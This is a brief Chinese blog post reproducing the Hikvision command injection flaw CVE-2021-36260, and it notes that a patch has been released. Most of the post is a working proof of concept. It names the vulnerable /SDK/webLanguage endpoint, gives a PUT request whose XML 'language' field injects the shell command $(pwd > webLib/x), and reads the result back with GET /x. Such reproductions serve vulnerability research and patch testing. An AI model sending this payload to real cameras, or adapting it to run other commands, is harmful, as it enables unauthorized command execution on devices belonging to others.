观天海康Hikvision 代码注入漏洞(CVE-2021-36260),官方已经发布修复补丁
漏洞存在地址:/SDK/webLanguage
测试:
PUT /SDK/webLanguage
payload: <?xml version="1.0" encoding="UTF-8"?><language>$(pwd > webLib/x)</language>
复现:
GET /x
海康威视Hikvision 注入漏洞(CVE-2021-36260)复现
未经允许不得转载:观天 » 海康威视Hikvision 注入漏洞(CVE-2021-36260)复现
